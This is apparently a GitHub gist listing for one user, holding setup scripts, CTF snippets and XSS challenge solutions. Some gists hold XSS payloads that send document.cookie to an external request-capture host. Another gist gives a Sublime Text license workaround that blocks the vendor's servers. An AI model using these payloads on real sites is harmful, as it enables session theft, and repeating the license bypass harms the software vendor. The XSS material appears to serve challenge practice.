Skip to content

Instantly share code, notes, and snippets.

View Isopach's full-sized avatar
:octocat:
Working from home forever!

Isopach Isopach

:octocat:
Working from home forever!
View GitHub Profile
@Isopach
Isopach / steps.md
Created February 21, 2018 04:42
Install and run Vuls on Docker on Kali Linux
  1. apt-get update problems: Invalid signature -> run wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add

  2. Couldn't run hello-world:latest locally: change the /etc/default/docker file, specifially the following lines:

# Use DOCKER_OPTS to modify the daemon startup options.
DOCKER_OPTS="--dns 8.8.8.8 --dns 8.8.4.4"
@Isopach
Isopach / knock.xss.moe.md
Last active June 28, 2020 16:44
Thousand Knocks XSS

{} = URL to view requests

Stage 6 /?q=</xmp><img+src=1+onerror=location.href='{}?'+document.cookie>

Stage 7 /?q=%27%20onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27 #なんでautofocusに値を入れないと実行されないでしょう?

Stage 8

@Isopach
Isopach / ajs
Last active March 16, 2018 05:53
location.href="https://requestb.in/1jdu8ud1?" + document.cookie;
@Isopach
Isopach / update_curl.sh
Last active April 8, 2018 06:52 — forked from fideloper/update_curl.sh
Update curl on Ubuntu 16.04.4
#! /usr/bin/env bash
# Install any build dependencies needed for curl
sudo apt-get build-dep curl
# Get latest (as of Feb 25, 2016) libcurl
mkdir ~/curl
cd ~/curl
wget http://curl.haxx.se/download/curl-7.50.2.tar.bz2
tar -xvjf curl-7.50.2.tar.bz2
@Isopach
Isopach / req.py
Created May 30, 2018 08:39
Send HTTP GET Request about 5x a second
import requests
while True:
r = requests.get('https://github.com')
print(str(r.status_code) + "\n" + r.content)
@Isopach
Isopach / loljpchat.bash
Last active March 9, 2019 23:16
League of Legends Appear Offline (JP)
#!/bin/bash
netsh advfirewall firewall add rule name="lolchat" dir=out remoteip=172.65.195.211 protocol=TCP action=block
@Isopach
Isopach / LICENCE SUBLIME TEXT
Created February 6, 2019 09:40
Sublime Text 3 Serial key build is 3176
## Sublime Text 3 Serial key build is 3176
> * Added these lines into /etc/hosts
127.0.0.1 www.sublimetext.com
127.0.0.1 license.sublimehq.com
> * Used the license key
----- BEGIN LICENSE -----
@Isopach
Isopach / install_pyenv.sh
Last active February 18, 2019 03:35 — forked from ysaotome/install_pyenv.sh
pyenv install for CentOS 7+ x86_64 without root
#!/bin/zsh
# pyenv install for CentOS 7+ x86_64
git clone https://github.com/pyenv/pyenv.git ~/.pyenv
export PATH="$HOME/.pyenv/bin:$PATH"
eval "$(pyenv init -)"
cat << _PYENVCONF_ >> ~/.zshrc
export PATH="$HOME/.pyenv/bin:$PATH"
@Isopach
Isopach / LICENSE.txt
Created August 23, 2019 03:52 — forked from 140bytes/LICENSE.txt
140byt.es -- Click ↑↑ fork ↑↑ to play!
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
@Isopach
Isopach / 1.py
Created October 7, 2019 02:32
Balsn ctf: ppm 1
for i in range(int(input())):
a,b=map(int,input().split())
print(a+b)